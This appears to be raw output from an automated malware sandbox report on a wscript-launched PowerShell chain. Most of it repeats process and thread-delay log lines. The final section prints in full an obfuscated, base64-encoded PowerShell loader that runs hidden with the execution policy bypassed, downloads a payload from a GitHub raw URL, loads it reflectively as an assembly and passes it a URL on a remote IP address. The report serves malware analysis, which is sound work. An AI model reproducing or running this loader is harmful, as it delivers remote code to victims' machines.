Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1836Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1335Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2764Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6978Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 2764 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep count: 6978 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000006.00000002.1383726636.000001776F5D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFblY6Y09NU1BlQ1s0LDE1LDI1XS1qT2lOJycpKCAoKCdzQk91cmwgJysnPSBVJysnTkloJysndHRwczonKycvL3Jhdy4nKydnaXRodWInKyd1c2UnKydyY29udCcrJ2VudC4nKydjb20nKycvJysnTicrJ29EZXQnKydlY3RPbi9Ob0RldCcrJ2VjdE8nKyduLycrJ3JlJysnZnMvaGVhZCcrJ3MvbWFpbi9EZXRhaCcrJ05vJysndGgtVi4nKyd0JysneHRVJysnTkk7IHNCJysnT2JhJysncycrJ2U2JysnNEMnKydvbnRlbnQgPSAoTmUnKyd3LU9iamVjJysndCAnKydTJysneXN0JysnZScrJ20nKycuTmV0LlcnKydlYkNsaWVudCkuRG93JysnbmxvYWRTdHInKydpbmcnKycoJysnc0JPdXJsJysnKTsgc0InKydPYmluYXInKyd5JysnQ29udGVudCAnKyc9IFtTJysneScrJ3N0ZScrJ20uQ28nKyduJysndicrJ2VydCcrJ106OkZyb21CJysnYScrJ3MnKydlNjRTJysndHJpbmcnKycoc0JPJysnYmFzZTY0QycrJ28nKydudGVudCk7JysnIHMnKydCT2FzJysnc2VtJysnYmx5ID0gW1JlZmxlY3Rpb24uJysnQXNzZW0nKydiJysnbCcrJ3ldOjonKydMb2EnKydkKCcrJ3NCT2JpbmFyeUNvbnRlbicrJ3QpOyBbJysnZG5saScrJ2IuSU8uJysnSG9tZV0nKyc6OlZBSScrJygnKydoUEl0eHQuUlInKydCRCcrJ0wvMDU0LzQzJysnMS4nKyc5JysnMicrJzEuNjQuJysnODknKycxLy8nKyc6cHR0aGhQSSwgJysnaFBJZGVzYXRpdicrJ2EnKydkb2hQSSwgJysnaFAnKydJZCcrJ2UnKydzJysnYXQnKydpdmFkbycrJ2hQSSwgaCcrJ1BJJysnZGVzYXRpdmEnKydkbycrJ2gnKydQSSwgJysnaFAnKydJYXNwJysnbmV0X3JlZ2Jyb3dzJysnZScrJ3JzaFBJLCcrJyBoUEknKydoJysnUEksJysnaFBJaCcrJ1AnKydJKScpLUNSZVBsQWNFICdVTkknLFtDaGFSXTM5ICAtcmVQTEFjZSAgJ2hQSScsW0NoYVJdMzQgIC1yZVBMQWNlICAoW0NoYVJdMTE1K1tDaGFSXTY2K1tDaGFSXTc5KSxbQ2hhUl0zNikp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $EnV:cOMSPeC[4,15,25]-jOiN'')( (('sBOurl '+'= U'+'NIh'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'N'+'oDet'+'ectOn/NoDet'+'ectO'+'n/'+'re'+'fs/head'+'s/main/Detah'+'No'+'th-V.'+'t'+'xtU'+'NI; sB'+'Oba'+'s'+'e6'+'4C'+'ontent = (Ne'+'w-Objec'+'t '+'S'+'yst'+'e'+'m'+'.Net.W'+'ebClient).Dow'+'nloadStr'+'ing'+'('+'sBOurl'+'); sB'+'Obinar'+'y'+'Content '+'= [S'+'y'+'ste'+'m.Co'+'n'+'v'+'ert'+']::FromB'+'a'+'s'+'e64S'+'tring'+'(sBO'+'base64C'+'o'+'ntent);'+' s'+'BOas'+'sem'+'bly = [Reflection.'+'Assem'+'b'+'l'+'y]::'+'Loa'+'d('+'sBObinaryConten'+'t); ['+'dnli'+'b.IO.'+'Home]'+'::VAI'+'('+'hPItxt.RR'+'BD'+'L/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhPI, '+'hPIdesativ'+'a'+'dohPI, '+'hP'+'Id'+'e'+'s'+'at'+'ivado'+'hPI, h'+'PI'+'desativa'+'do'+'h'+'PI, '+'hP'+'Iasp'+'net_regbrows'+'e'+'rshPI,'+' hPI'+'h'+'PI,'+'hPIh'+'P'+'I)')-CRePlAcE 'UNI',[ChaR]39 -rePLAce 'hPI',[ChaR]34 -rePLAce ([ChaR]115+[ChaR]66+[ChaR]79),[ChaR]36))"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrfbly6y09nu1blq1s0lde1ldi1xs1qt2lojycpkcaokcdzqk91cmwgjysnpsbvjysntklojysndhrwczonkycvl3jhdy4nkydnaxrodwinkyd1c2unkydyy29udccrj2vudc4nkydjb20nkycvjysnticrj29ezxqnkydly3rpbi9ob0rldccrj2vjde8nkydulycrj3jljysnznmvagvhzccrj3mvbwfpbi9ezxrhaccrj05vjysndggtvi4nkyd0jysnehrvjysntkk7ihncjysnt2jhjysncycrj2u2jysnnemnkydvbnrlbnqgpsaotmunkyd3lu9iamvjjysndcankydtjysnexn0jysnzscrj20nkycutmv0llcnkydlyknsawvudckurg93jysnbmxvywrtdhinkydpbmcnkycojysnc0jpdxjsjysnktsgc0inkydpymluyxinkyd5jysnq29udgvudcankyc9ifttjysnescrj3n0zscrj20uq28nkydujysndicrj2vydccrj106okzyb21cjysnyscrj3mnkydlnjrtjysndhjpbmcnkycoc0jpjysnymfzzty0qycrj28nkydudgvudck7jysnihmnkydct2fzjysnc2vtjysnymx5id0gw1jlzmxly3rpb24ujysnqxnzzw0nkydijysnbccrj3ldojonkydmb2enkydkkccrj3nct2jpbmfyeunvbnrlbicrj3qpoybbjysnzg5sascrj2iusu8ujysnsg9tzv0nkyc6olzbsscrjygnkydouel0ehquulinkydcrccrj0wvmdu0lzqzjysnms4nkyc5jysnmicrjzeunjqujysnodknkycxly8nkyc6chr0aghqsswgjysnafbjzgvzyxrpdicrj2enkydkb2hqsswgjysnafankydjzccrj2unkydzjysnyxqnkydpdmfkbycrj2hqsswgaccrj1bjjysnzgvzyxrpdmenkydkbycrj2gnkydqsswgjysnafankydjyxnwjysnbmv0x3jlz2jyb3dzjysnzscrj3jzafbjlccrjyboueknkydojysnueksjysnafbjaccrj1ankydjkscplunszvbsqwnficdvtkknlftdagfsxtm5icatcmvqtefjzsagj2hqsscsw0noyvjdmzqgic1yzvbmqwnlicaow0noyvjdmte1k1tdagfsxty2k1tdagfsxtc5ksxbq2hhul0znikp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
